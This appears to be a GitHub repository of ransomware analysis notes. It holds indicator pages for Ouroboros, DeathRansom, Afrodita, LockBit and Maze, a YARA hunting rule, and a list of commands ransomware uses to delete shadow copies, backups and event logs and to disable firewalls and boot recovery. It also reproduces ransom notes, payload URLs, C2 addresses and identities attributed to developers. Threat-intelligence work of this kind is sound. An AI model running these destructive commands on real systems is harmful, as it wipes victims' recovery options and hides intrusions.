├── .gitignore ├── .DS_Store ├── Stealer-Windows-Krown ├── .DS_Store └── README.md ├── Ransomware ├── _ransom_cmd.md ├── _ransomware.yara ├── Ouroboros.md ├── DeathRansom.md ├── Afrodita.md ├── Maze.md ├── Clop.md ├── Snake.md ├── Mamo434376.md ├── Antefrigus.md ├── Nemty.md ├── PureLocker.md ├── Lockbit.md ├── Robbinhood.md ├── Snatch.md └── _ransom_notes.md ├── Ransomware-Windows-LockBit-v3 └── README.md ├── Ransomware-Windows-DarkBit └── README.md ├── Ransomware-Windows-Yanluowang └── README.md └── Ransomware-Linux-Lockbit └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | .DS_Store 3 | -------------------------------------------------------------------------------- /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/albertzsigovits/malware-notes/HEAD/.DS_Store -------------------------------------------------------------------------------- /Stealer-Windows-Krown/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/albertzsigovits/malware-notes/HEAD/Stealer-Windows-Krown/.DS_Store -------------------------------------------------------------------------------- /Ransomware/_ransom_cmd.md: -------------------------------------------------------------------------------- 1 | ## Ransom commands 2 | Most common OS commands executed by ransomware to inhibit recovery (shadow copies, backups, boot recovery, event logs). Every one of these is a legitimate built-in administration tool, so detection should key on the argument patterns listed below and on the parent process (a user-writable path, an Office/browser child, an unexpected service host) rather than on the binary name alone. 3 | 4 | ## Bcdedit 5 | - bcdedit /set {default} bootstatuspolicy ignoreallfailures 6 | - bcdedit /set {default} recoveryenabled no 7 | - bcdedit /set {current} safeboot minimal (forces the next boot into Safe Mode, where most endpoint security agents and third-party services are not started) 8 | 9 | ## Fsutil 10 | - fsutil usn deletejournal /D <volume> (e.g. `fsutil usn deletejournal /D C:`; removes the NTFS change journal, a key forensic timeline source) 11 | - fsutil file setZeroData offset=<offset> length=<length> <file> (zeroes a byte range of a file in place; the bare `offset=` form is incomplete and will not run) 12 | 13 | ## Netsh 14 | - netsh advfirewall set currentprofile state off 15 | - netsh firewall set opmode disable 16 | - netsh firewall set opmode mode=disable 17 | 18 | ## Shutdown 19 | - shutdown.exe /r /f /t 00 20 | 21 | ## Vssadmin 22 | - vssadmin 
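delete shadows /all /quiet 23 | - vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB 24 | - vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded 25 | 26 | ## Wbadmin 27 | - wbadmin delete backup 28 | - wbadmin delete catalog -quiet 29 | - wbadmin delete systemstatebackup 30 | - wbadmin delete systemstatebackup -deleteOldest 31 | - wbadmin delete systemstatebackup -keepversions:0 32 | 33 | ## Wevtutil 34 | - wevtutil cl system 35 | - wevtutil cl security 36 | - wevtutil cl application 37 | (each clear still writes a record into the fresh log — Event ID 1102 in Security, 104 in System — which is itself a high-fidelity detection) 38 | ## Wmic 39 | - wmic shadowcopy /nointeractive 40 | - wmic shadowcopy delete 41 | -------------------------------------------------------------------------------- /Ransomware/_ransomware.yara: --------------------------------------------------------------------------------
// Loose triage / hunting rule: a small PE carrying a high density of
// ransomware-typical vocabulary (shadow-copy and backup deletion, boot
// recovery tampering, ransom-note wording).
//
// Hunting only, not a blocking signature: many of the tokens ("net", "stop",
// "sc", "set", "all", "key", "cmd", "files", "system", "create", "call",
// "process", "backup") are short generic words present in plenty of benign
// binaries, so expect false positives and triage hits by hand.
//
// The original listing declared 54 strings but five of them were exact
// duplicates (wmic, powershell, vssadmin, create, quiet), and duplicate
// identifiers always co-match, so "35 of them" was effectively reached with
// ~30 distinct tokens. The duplicates are removed below (identifiers keep
// their original numbers, hence the gaps); the threshold is kept at 35 of
// the remaining 49 — retune against a benign corpus before deploying.
rule detect_ransomware_test35
{
    strings:
        $ransom0  = "PhysicalDrive" ascii wide
        $ransom1  = "attrib" ascii wide
        $ransom2  = "runas" ascii wide
        $ransom3  = "net" ascii wide
        $ransom4  = "stop" ascii wide
        $ransom5  = "sc" ascii wide
        $ransom6  = "config" ascii wide
        $ransom7  = "wevtutil" ascii wide
        $ransom8  = "taskkill" ascii wide
        $ransom9  = "vssadmin" ascii wide
        $ransom10 = "quiet" ascii wide
        $ransom11 = "diskshadow" ascii wide
        $ransom12 = "shadows" ascii wide
        $ransom13 = "all" ascii wide
        $ransom14 = "schtasks" ascii wide
        $ransom15 = "create" ascii wide
        $ransom16 = "system" ascii wide
        $ransom17 = "wmic" ascii wide
        $ransom18 = "powershell" ascii wide
        $ransom19 = "cmd" ascii wide
        $ransom20 = "bcdedit" ascii wide
        $ransom21 = "set" ascii wide
        $ransom22 = "fsutil" ascii wide
        $ransom23 = "deletejournal" ascii wide
        $ransom24 = "usn" ascii wide
        $ransom25 = "recoveryenabled" ascii wide
        $ransom26 = "bootstatuspolicy" ascii wide
        $ransom27 = "ignoreallfailures" ascii wide
        // $ransom28 "wmic" removed: duplicate of $ransom17
        $ransom29 = "shadowcopy" ascii wide
        $ransom30 = "delete" ascii wide
        // $ransom31 "powershell" removed: duplicate of $ransom18
        $ransom32 = "win32_shadowcopy" ascii wide
        // $ransom33 "vssadmin" removed: duplicate of $ransom9
        $ransom34 = "resize" ascii wide
        $ransom35 = "shadowstorage" ascii wide
        $ransom36 = "process" ascii wide
        $ransom37 = "call" ascii wide
        // $ransom38 "create" removed: duplicate of $ransom15
        $ransom39 = "wbadmin" ascii wide
        $ransom40 = "catalog" ascii wide
        // $ransom41 "quiet" removed: duplicate of $ransom10
        $ransom42 = "systemstatebackup" ascii wide
        $ransom43 = "backup" ascii wide
        $ransom44 = "ransom" ascii wide
        $ransom45 = "files" ascii wide
        $ransom46 = "encrypt" ascii wide
        $ransom47 = "RSA" ascii wide
        $ransom48 = "AES" ascii wide
        $ransom49 = "key" ascii wide
        $ransom50 = "wallet" ascii wide
        $ransom51 = "decrypt" ascii wide
        $ransom52 = "recover" ascii wide
        $ransom53 = "payment" ascii wide

    condition:
        // MZ header, small binary, and at least 35 of the 49 distinct tokens.
        uint16(0) == 0x5a4d and filesize < 1MB and 35 of them
}
-------------------------------------------------------------------------------- /Ransomware/Ouroboros.md: -------------------------------------------------------------------------------- 1 | # Ouroboros v7 ransomware 2 | 3 | ## References 4 | - https://app.any.run/tasks/d8f2f343-cc63-40ca-8571-2d5c8d139f16 5 | 6 | ## Ransom e-mail 7 | - Honeylock@protonmail.com 8 | - Honeylock@cock.li (fallback address given in the ransom note below) 9 | ## Ransom extension 10 | - .odveta 11 | 12 | ## Renamed files format 13 | - .Email=[...]ID=[...] 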
14 | 15 | ## PDB 16 | - C:\Users\LEGION\Desktop\New folder\sha_simd.cpp 17 | - C:\Users\LEGION\Desktop\New folder\gcm_simd.cpp 18 | - C:\Users\LEGION\Desktop\New folder\sse_simd.cpp 19 | - D:\Ouroboros v7\Ouroborosv7\Release\Ouroborosv7.pdb 20 | (`sha_simd.cpp`, `gcm_simd.cpp` and `sse_simd.cpp` are Crypto++ source files — compare the explicit `cryptopp\` PDB paths recorded for Afrodita on this page — so the sample statically links Crypto++; the `LEGION` user name and `New folder` path are a developer-environment artifact worth pivoting on) 21 | ## External IP lookup (not C2) 22 | ``` 23 | sfml-dev.org/ip-provider.php 24 | User-Agent: libsfml-network/2.x 25 | ``` 26 | `ip-provider.php` on sfml-dev.org is the public-IP service that the SFML library's own `IpAddress::getPublicAddress()` contacts, and `libsfml-network/2.x` is that library's default User-Agent. It is a legitimate third-party site, not attacker infrastructure — do not block or attribute it on the strength of this note; presumably the returned address is what the sample reports in the `&ip=` parameter below. 27 | ## C2 server 28 | ``` 29 | 80.82.69.52 - WIN-CMHPELDRE6E 30 | ``` 31 | 32 | ## URI parameters 33 | - &mail= 34 | - &id= 35 | - &key= 36 | - &disk= 37 | - &ip= 38 | 39 | ## Commands executed 40 | - bcdedit /set {default} bootstatuspolicy ignoreallfailures 41 | - bcdedit /set {default} recoveryenabled no 42 | - netsh advfirewall set currentprofile state off 43 | - netsh firewall set opmode mode=disable 44 | - vssadmin delete shadows /all 45 | - wbadmin delete catalog -quiet 46 | 47 | ## Dropped files 48 | - C:\ProgramData\id.txt 49 | - C:\ProgramData\ids.txt 50 | - C:\ProgramData\Pkey.txt 51 | - C:\ProgramData\info.txt 52 | - C:\ProgramData\uiapp.exe 53 | 54 | ## Extension list 55 | ``` 56 | .exe 57 | .mdf 58 | .pst 59 | .bak 60 | .tib 61 | .DBF 62 | .zip 63 | ``` 64 | 65 | ## Process kill list 66 | ``` 67 | sqlserver.exe 68 | msftesql.exe 69 | sqlagent.exe 70 | sqlbrowser.exe 71 | sqlwriter.exe 72 | mysqld.exe 73 | mysqld-nt.exe 74 | mysqld-opt.exe 75 | ``` 76 | 77 | ## Service stop list 78 | ``` 79 | net stop SQLWriter 80 | net stop SQLBrowser 81 | net stop MSSQLSERVER 82 | net stop MSSQL$CONTOSO1 83 | net stop MSDTC 84 | net stop SQLSERVERAGENT 85 | net stop vds 86 | ``` 87 | 88 | ## RSA key (2048-bit SubjectPublicKeyInfo; the trailing `AgER` decodes to public exponent 17, Crypto++'s default, consistent with the PDB paths above — the Afrodita key on this page ends the same way) 89 | ``` 90 | MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEAzA+0svdK/zcghzPRS7F+pPzCjAlygcNhQj/T5g7HigLegVH/Fi2dhjBDxjt9Ly3aPsHpTb32ub2xb3gvv2VcBi4P 91 | VOClceG9Pq6M6HlUGYt1yhSRx8v+0CHX9Dg9rA/3SMhlqsVodtHtMbefPnPhto1/QY4FCcS3xGcC97Ja+oDkCVnkES8U1xeHno5kIlIWMulS5pjM6D3hss5yjUjIHiSr06QS 92 | 4gCLX1ZijMo0wA3y6k9RUm9Me8MYiss/39RzsgGwDv5+DNxkLgSU25Sa2NZ8iG+Vufk/CkWe9CQj/SRCHm/mVQpNlfbthTTGh3OXy36pu46nYv3fS/ulkqHTaQIBEQ== 93 | 
``` 94 | 95 | ## Ransom note: 96 | ``` 97 | in Case of no answer contact : Honeylock@cock.li 98 | You Can Learn How to Buy Bitcoin From This links Below 99 | https://localbitcoins.com/buy_bitcoins 100 | https://www.coindesk.com/information/how-can-i-buy-bitcoins 101 | Your Id: 102 | ***All Your Files Has Been Encrypted*** 103 | You have To Pay To Get Decryption Tool with Key 104 | The Time That Your System infected has been logged in Our Server 105 | So Being late more Than 48hours To contact or paying us will Double The price 106 | And using 3rd party applications may damage your files and increase the Price 107 | You Can Send some Files that not Contains Valuable Data To make Sure That Your Files Can be Back with our Tool 108 | The Payment Should Be with Cryptocurrencies Like Bitcoin(BTC) Send Email to Know the Price And Do an Agreement 109 | Our Email: 110 | ``` -------------------------------------------------------------------------------- /Ransomware/DeathRansom.md: -------------------------------------------------------------------------------- 1 | # DeathRansom \ Wacatac ransomware 2 | 3 | ## SHA256 hashes 4 | - 05b762354678004f8654e6da38122e6308adf3998ee956566b8f5d313dc0e029 5 | - 0cf124b2afc3010b72abdc2ad8d4114ff1423cce74776634db4ef6aaa08af915 6 | - 13d263fb19d866bb929f45677a9dcbb683df5e1fa2e1b856fde905629366c5e1 7 | - 1e1fcb1bcc88576318c37409441fd754577b008f4678414b60a25710e10d4251 8 | - 2b9c53b965c3621f1fa20e0ee9854115747047d136529b41872a10a511603df8 9 | - 4bc383a4daff74122b149238302c5892735282fa52cac25c9185347b07a8c94c 10 | - 6247f283d916b1cf0c284f4c31ef659096536fe05b8b9d668edab1e1b9068762 11 | - 66ee3840a9722d3912b73e477d1a11fd0e5468769ba17e5e71873fd519e76def 12 | - a45a75582c4ad564b9726664318f0cccb1000005d573e594b49e95869ef25284 13 | - dc9ff5148e26023cf7b6fb69cd97d6a68f78bb111dbf39039f41ed05e16708e4 14 | - e767706429351c9e639cfecaeb4cdca526889e4001fb0c25a832aec18e6d5e06 15 | - f78a743813ab1d4eee378990f3472628ed61532e899503cc9371423307de3d8b 16 | - 
fedb4c3b0e080fb86796189ccc77f99b04adb105d322bddd3abfca2d5c5d43c8 17 | 18 | ## References 19 | - https://id-ransomware.blogspot.com/2019/11/wacatac-ransomware.html 20 | - https://twitter.com/search?q=deathransom&src=typed_query 21 | - https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html 22 | 23 | ## IoCs and Notes 24 | ### Others 25 | - Encrypted extension: `.wctc` 26 | - Ransom note: `read_me.txt` 27 | - Check-in : `https://iplogger.org/1Zqq77` 28 | - Shadow copy deletion: `select * from Win32_ShadowCopy` via `ROOT\cimv2` 29 | 30 | ### IoCs 31 | - `iplogger[.]org/1Zqq77` 32 | - `bitbucket[.]org/scat01/1/downloads/Wacatac_2019-11-16_14-06.exe` 33 | - `bitbucket[.]org/scat01` 34 | - `scat01.mcdir[.]ru` 35 | - `scat01[.]tk` 36 | - `gameshack[.]ru/scat01.exe` 37 | 38 | ### Ransom e-mails: 39 | - `death@cumallover.me` 40 | - `death@firemail.cc` 41 | - `deathransom@airmail.cc` 42 | 43 | ### Ransom address: 44 | - `1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N` 45 | 46 | ### Registry keys used for private/public key: 47 | - `HKCU\SOFTWARE\Wacatac` 48 | - `HKCU\SOFTWARE\Wacatac\private` 49 | - `HKCU\SOFTWARE\Wacatac\public` 50 | 51 | ### Excluded files/folders from encryption: 52 | - `programdata` 53 | - `$recycle.bin` 54 | - `program files` 55 | - `windows` 56 | - `all users` 57 | - `appdata` 58 | - `read_me.txt` 59 | - `autoexec.bat` 60 | - `desktop.ini` 61 | - `autorun.inf` 62 | - `ntuser.dat` 63 | - `iconcache.db` 64 | - `bootsect.bak` 65 | - `boot.ini` 66 | - `ntuser.dat.log` 67 | - `thumbs.db` 68 | 69 | ## Developer's identities: 70 | - scat01 71 | - nedugov 72 | - nedugov99 73 | - SoftEgorka 74 | - undefined_Nedugov 75 | - Phone: `+7951****311` 76 | - VKontakte: `id154704666` 77 | - E-mail: `vitasa01@yandex.ru` 78 | - Instagram: `pro_huligan_` 79 | - WebMoneyID: `372443071304` 80 | 81 | ## Ransom note: 82 | ``` 83 | ????????????????????????? 84 | ??????DEATHRansom ??????? 85 | ????????????????????????? 
86 | Hello dear friend, 87 | Your files were encrypted! 88 | You have only 12 hours to decrypt it 89 | In case of no answer our team will delete your decryption password 90 | Write back to our e-mail: deathransom@airmail.cc 91 | 92 | 93 | In your message you have to write: 94 | 1. YOU LOCK-ID: %s 95 | 2. Time when you have paid 0.1 btc to this bitcoin wallet: 96 | 1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N 97 | 98 | 99 | After payment our team will decrypt your files immediatly 100 | 101 | 102 | Free decryption as guarantee: 103 | 1. File must be less than 1MB 104 | 2. Only .txt or .lnk files, no databases 105 | 3. Only 1 files 106 | 107 | 108 | How to obtain bitcoin: 109 | The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment 110 | method and price. 111 | https://localbitcoins.com/buy_bitcoins 112 | Also you can find other places to buy Bitcoins and beginners guide here: 113 | http://www.coindesk.com/information/how-can-i-buy-bitcoins/ 114 | ``` 115 | -------------------------------------------------------------------------------- /Ransomware-Windows-LockBit-v3/README.md: -------------------------------------------------------------------------------- 1 | # LockBit v3.0 (LockBit Black) 2 | 3 | ## Hashes: 4 | - 391a97a2fe6beb675fe350eb3ca0bc3a995fda43d02a7a6046cd48f042052de5 5 | - 506f3b12853375a1fbbf85c82ddf13341cf941c5acd4a39a51d6addf145a7a51 6 | - 80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce 7 | - c6cf5fd8f71abaf5645b8423f404183b3dea180b69080f53b9678500bab6f0de 8 | - d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee 9 | 10 | ## ITW Names: 11 | - name:{04830965-76E6-6A9A-8EE1-6AF7499C1D08}.exe 12 | 13 | ## Execution: 14 | - {04830965-76E6-6A9A-8EE1-6AF7499C1D08}.exe -k LocalServiceNetworkRestricted -pass db66023ab2abcb9957fb01ed50cdfa6a 15 | 16 | ## Samples: 17 | - https://bazaar.abuse.ch/browse/tag/lockbit%20black/ 18 | - 
https://bazaar.abuse.ch/browse/tag/lockbit3/ 19 | 20 | ## YARA rules: 21 | - https://yaraify.abuse.ch/yarahub/rule/LockbitBlack_Loader/ 22 | - https://yaraify.abuse.ch/yarahub/rule/lockbitblack_ransomnote/ 23 | - https://yaraify.abuse.ch/search/yara/LockBit3Detect_via_SectionPatterns/ 24 | 25 | ## Tweets: 26 | - https://twitter.com/vxunderground/status/1543661557883740161 27 | - https://twitter.com/cPeterr/status/1543692271186579459 28 | - https://twitter.com/captainGeech42/status/1543682202449465344 29 | - https://twitter.com/fwosar/status/1543700719181746182 30 | - https://twitter.com/WhichbufferArda/status/1543900539280293889 31 | - https://twitter.com/gN3mes1s/status/1544248752256520193 32 | - https://twitter.com/SI_FalconTeam/status/1543997169199419394 33 | - https://twitter.com/MalGamy12/status/1544080516802121728 34 | - https://twitter.com/cluster25_io/status/1544313400561471491 35 | 36 | ## Sandboxes: 37 | - https://tria.ge/220704-dfxvbaebdj 38 | 39 | ## VT Perks: 40 | - comment:"LockBit Black" 41 | - comment:"LockBit 3.0" 42 | - metadata:0x1b46f 43 | - entry_point:111727 44 | - imphash:a50a0d82b9120fc73965c28fea79e1f9 45 | 46 | ## Strings: 47 | ```yara 48 | ---------------------------- 49 | | FLOSS STACK STRINGS (13) | 50 | ---------------------------- 51 | Default 52 | WinSta0 53 | *recycle* 54 | fJS6 55 | bootmgr 56 | .ico 57 | \Defaul 58 | Volume{ 59 | 60 | --------------------------- 61 | | FLOSS TIGHT STRINGS (3) | 62 | --------------------------- 63 | ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/* 64 | TrustedInstaller 65 | 66 | ------------------------------- 67 | | FLOSS DECODED STRINGS (102) | 68 | ------------------------------- 69 | ... 
70 | LDAP://%s 71 | WinSta0\Default 72 | Program Files 73 | gPCUserExtensionNames 74 | %s_IPC$ 75 | LDAP://CN=Computers, 76 | LDAP://DC=%s,DC=%s 77 | __ProviderArchitecture 78 | ADMIN 79 | %sADMIN$\Temp\%s.exe 80 | %04d-%02d-%02d %02d:%02d:%02d 81 | hScreen 82 | distinguishedName 83 | defaultNamingContext 84 | %s.README.txt 85 | %sADMIN$\Temp 86 | \.\pipe\%s 87 | GPT.INI 88 | Control Panel\International 89 | SOFTWARE\Microsoft\Windows NT\CurrentVersion 90 | ROOT\CIMV2 91 | wall 92 | %spipe\%s 93 | Mailbox 94 | \%s.%s\ 95 | pass 96 | LDAP://rootDSE 97 | O:BAG:SYD:(A;;0x1;;;SY)(A;;0x5;;;BA)(A;;0x1;;;LA) 98 | 2621892 99 | ProductName 100 | dNSHostName 101 | Enabled 102 | LocaleName 103 | Software\Microsoft\Windows\CurrentVersion\Group Policy\Status 104 | versionNumber 105 | \%s\sysvol\%s\scripts\ 106 | LDAP://CN=Policies,CN=System,%s 107 | %TempDir% 108 | {%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 109 | %%SystemRoot%%\Temp\%s.exe 110 | Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} 111 | SELECT * FROM Win32_ShadowCopy 112 | ChannelAccess 113 | [General] 114 | Version=%s 115 | displayName=%s 116 | {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 117 | Global\%.8x%.8x%.8x%.8x 118 | dllhost.exe 119 | sLanguage 120 | %s=%s 121 | LDAP://CN=%s,CN=Policies,CN=System,DC=%s,DC=%s 122 | SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels 123 | LDAP://%s/DC=%s,DC=%s 124 | gPCMachineExtensionNames 125 | NT AUTHORITY\SYSTEM 126 | %.8x%.8x%.8x%.8x% 127 | gdel 128 | WINSPOOL 129 | displayName 130 | %%SystemRoot%%\Temp\%s.exe -k LocalServiceNetworkRestricted 131 | Win32_ShadowCopy.ID='%s' 132 | \.\pipe\{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 133 | POST 134 | .dll 135 | office 136 | psex 137 | %%SystemRoot%%\Temp\%s.exe -k LocalServiceNetworkRestricted -pass %s 138 | EventLog 139 | Registry.pol 140 | ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 141 | ExchangeInstallPath 142 | Consolas 143 | 
SYSTEM\CurrentControlSet\Services\EventLog 144 | onenote 145 | ABCDIJKLEFGHQRSTMNOPYZabUVWXghijcdefopqrklmnwxyzstuv4567012389 146 | Times New Roman 147 | comment.cmtx 148 | SOFTWARE\%s 149 | ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ 150 | vE29 151 | ``` 152 | -------------------------------------------------------------------------------- /Ransomware/Afrodita.md: -------------------------------------------------------------------------------- 1 | # Afrodita ransomware 2 | 3 | ## SHA256 hashes 4 | 5 | ## References 6 | - https://www.vmray.com/analyses/ed58323b71a8/report/overview.html 7 | - https://app.any.run/tasks/07cbb83d-5fa5-4a5d-a39b-6aa6df03b4f2/ 8 | - https://id-ransomware.blogspot.com/2020/01/afrodita-ransomware.html 9 | - https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html 10 | 11 | ## Notes 12 | - Mostly distributed UPX packed, no other packer seen so far 13 | 14 | ## Payloads 15 | ```url 16 | riskpartner.hr/wp-content/notnice.jpg 17 | poloprint.hr/wp-content/uploads/2017/05/havefun.png 18 | content-delivery.in/verynice.jpg 19 | ``` 20 | 21 | ## Mutex 22 | - 835821AM3218SAZ 23 | 24 | ## DLL Exports 25 | - Sura 26 | - Ares 0701 27 | 28 | ## PE Resource section 29 | - IDR_RSA - RSA public key 30 | - Interesting sublang: SUBLANG_ARABIC_OMAN 31 | - Offset 0x000b1070 32 | - Size 0x00000124 33 | 34 | ## Files dropped 35 | - \AppData\Local\Temp\_uninsep.bat 36 | - client-encrypted-private.key 37 | - client-public.key 38 | - main-public.key 39 | - _README_RECOVERY_.txt 40 | 41 | ## Embedded RSA key 42 | ``` 43 | -----BEGIN RSA PUBLIC KEY----- 44 | MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEAxs2xkeHRygZBupFc2+Z//dLnMbWR/NiXQBmP 45 | 10Q7nbG/5jaDcik+eGDh2zz6XYr2Ur+sS1yD4/1XQeIZ/zjcjC43H090nUlELTtq9ED8LqevnrOaMQFy 46 | UIhQU+plY5eJd6KuW2dCdv8n0uBDAzBQRnpjJr0AmnkEzRGD5XCoYtrR061kBAerXQjBxhQSnsMWxE2R 47 | excq38tgf/szXPaoSD1vsSmIwXbc3nTkadYPfjLu6aWWYmikWIi3z+RoUOm7OhmaOu+azPCPBjHc93cB 48 | 
KsLnxzSHiKRFN4cd0Tu+uvehGl1+v3CK0Zj+nr5OfeNjMGYQj80t0+AqnDQkzwdA/wIBEQ== 49 | -----END RSA PUBLIC KEY----- 50 | ``` 51 | Note: despite the `RSA PUBLIC KEY` armour, the DER (`MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0A…`, i.e. SEQUENCE { rsaEncryption OID, NULL }, BIT STRING) is a SubjectPublicKeyInfo — what OpenSSL expects under `-----BEGIN PUBLIC KEY-----`. Load it with `openssl pkey -pubin`, not `openssl rsa -RSAPublicKey_in`. The trailing `AgER` is public exponent 17, Crypto++'s default, matching the `cryptopp\` PDB paths below (the Ouroboros key on this page ends the same way — worth checking for code overlap). 52 | ## Ransom e-mails 53 | - afroditateam@tutanota.com 54 | - afroditasupport@firemail.cc 55 | - afroditasupport@mail2tor.com 56 | 57 | ## Telegram Support 58 | - @RecoverySupport 59 | 60 | ## ITW Filenames 61 | - Afrodita.dll 62 | - test.dll 63 | - notnice.png 64 | - havefun.png 65 | - verynice.jpg 66 | 67 | ## List of extensions to encrypt 68 | ``` 69 | .WALLET 70 | .CLASS 71 | .INCPAS 72 | .ACCDB 73 | .ACCDR 74 | .ACCDT 75 | .ACCDE 76 | .D3DBSP 77 | .BACKUPDB 78 | .BACKUP 79 | .IBANK 80 | .PKPASS 81 | .MDDATA 82 | .MDBACKUP 83 | .SYNCDB 84 | .LAYOUT 85 | .DAZIP 86 | .ARCH00 87 | .VPP_PC 88 | .MCMETA 89 | .MPQGE 90 | .LITEMOD 91 | .ASSET 92 | .FORGE 93 | .RGSS3A 94 | .WOTREPLAY 95 | .MRWREF 96 | .BLEND 97 | .DESIGN 98 | .YCBCRA 99 | .SQLITEDB 100 | .SQLITE3 101 | .SQLITE 102 | .SAS7BDAT 103 | .PSAFE3 104 | .ERBSQL 105 | .DB-JOURNAL 106 | .MONEYWELL 107 | ``` 108 | 109 | ## List of folders to avoid 110 | ``` 111 | Program Files (x86) 112 | All Users 113 | $GetCurrent 114 | AppData 115 | Program Files 116 | ProgramData 117 | Windows 118 | ``` 119 | 120 | ## uninsep.bat cleanup file 121 | ``` 122 | :Repeat 123 | del "C:\Users\admin\Desktop\notnice.jpg.exe" 124 | if exist "C:\Users\admin\Desktop\notnice.jpg.exe" goto Repeat 125 | rmdir "C:\Users\admin\Desktop" 126 | del "C:\Users\admin\AppData\Local\Temp\_uninsep.bat" 127 | ``` 128 | (the literal paths reflect the sandbox run — `admin` user, `notnice.jpg.exe` — so detect on the self-deleting `:Repeat` / `del` / `goto` loop and the `_uninsep.bat` name in `%TEMP%`, not on the path; note it also tries to `rmdir` the user's Desktop) 129 | ## PDB 130 | ``` 131 | F:\Work\x_Projects\Afrodita - VS2019\Afrodita\cryptopp\rijndael_simd.cpp 132 | F:\Work\x_Projects\Afrodita - VS2019\Afrodita\cryptopp\sha_simd.cpp 133 | F:\Work\x_Projects\Afrodita - VS2019\Afrodita\cryptopp\sse_simd.cpp 134 | ``` 135 | 136 | ## Ransom note's filename 137 | ``` 138 | __README_RECOVERY_.txt 139 | ``` 140 | (the "Files dropped" list above gives this as `_README_RECOVERY_.txt`, with a single leading underscore — confirm which name the sample actually writes before using either as an indicator) 141 | ## Ransom note 142 | ``` 143 | ~~~ Greetings ~~~ 144 | [+] What has happened? [+] 145 | Your files are encrypted, and currently unavailable. You are free to check. 
146 | Every file is recoverable by following our instructions below. 147 | Encryption algorithms used: AES256(CBC) + RSA2048 (military/government grade). 148 | [+] Guarantees? [+] 149 | This is our daily job. We are not here to lie to you - as you are 1 of 10000's. 150 | Our only interest is in us getting payed and you getting your files back. 151 | If we were not able to decrypt the data, other people in same situation as you 152 | wouldn't trust us and that would be bad for our buissness -- 153 | So it's not in our interest. 154 | To prove our ability to decrypt your data you have 1 file free decryption. 155 | If you don't want to pay the fee for bringing files back that's okey, 156 | but remeber that you will lose a lot of time - and time is money. 157 | Don't waste your time and money trying to recover files using some file 158 | recovery "experts", we have your private key - only we can get the files back. 159 | With our service you can go back to original state in less then 30 minutes. 160 | [+] Service [+] 161 | If you decided to use our service please follow instructions below. 
162 | Contact us: 163 | email address: afroditasupport@mail2tor.com, put in cc: afroditasupport@firemail.cc 164 | ``` 165 | -------------------------------------------------------------------------------- /Ransomware/Maze.md: -------------------------------------------------------------------------------- 1 | # Maze ransomware 2 | 3 | ## SHA256 hashes 4 | 04e22ab46a8d5dc5fea6c41ea6fdc913b793a4e33df8f0bc1868b72b180c0e6e 5 | 067f1b8f1e0b2bfe286f5169e17834e8cf7f4266b8d97f28ea78995dc81b0e7b 6 | 153defee225de889d2ac66605f391f4aeaa8b867b4093c686941e64d0d245a57 7 | 195ef8cfabc2e877ebb1a60a19850c714fb0a477592b0a8d61d88f0f96be5de9 8 | 19713e7ae529091a995effe4e7271f2c23487c594af0a39cd4335d95e0abc99d 9 | 58fe9776f33628fd965d1bcc442ec8dc5bfae0c648dcaec400f6090633484806 10 | 5c9b7224ffd2029b6ce7b82ea40d63b9d4e4f502169bc91de88b4ea577f52353 11 | 6a22220c0fe5f578da11ce22945b63d93172b75452996defdc2ff48756bde6af 12 | 7c03b49d24c948f838b737fb476d57849a1fd6b205f94214bf2a5a3b7a36f17a 13 | 806fc33650b7ec35dd01a06be3037674ae3cc0db6ba1e3f690ee9ba9403c0627 14 | 822a264191230f753546407a823c6993e1a83a83a75fa36071a874318893afb8 15 | 91514e6be3f581a77daa79e2a4905dcbdf6bdcc32ee0f713599a94d453a26fc1 16 | 9e88e833d1309fe1417628519851f74cffafa51ea8a65bbd7f0433c9d9be196a 17 | a9da834206c24147866c3281c0ba898fb0d162fd9f87453df4c1674aaed45df7 18 | c040defb9c90074b489857f328d3e0040ac0ddab26cde132f17cccae7f1309cc 19 | e8a091a84dd2ea7ee429135ff48e9f48f7787637ccb79f6c3eb42f34588bc684 20 | ebbb5ac2be538edff5560ef74b996a3fbc3589b3063074c5037da05acd6374d2 21 | fc611f9d09f645f31c4a77a27b6e6b1aec74db916d0712bef5bce052d12c971f 22 | 23 | ## References 24 | https://twitter.com/VK_Intel/status/1189431136398794752 25 | https://twitter.com/VK_Intel/status/1186346215388131333 26 | https://twitter.com/VK_Intel/status/1185255932474904576 27 | https://twitter.com/MalwareTechBlog/status/1184926173861572608 28 | http://mazenews.top 29 | 30 | ## Notes 31 | - Maze Team maintains a site: `mazenews.top` 32 | - Ransom note 
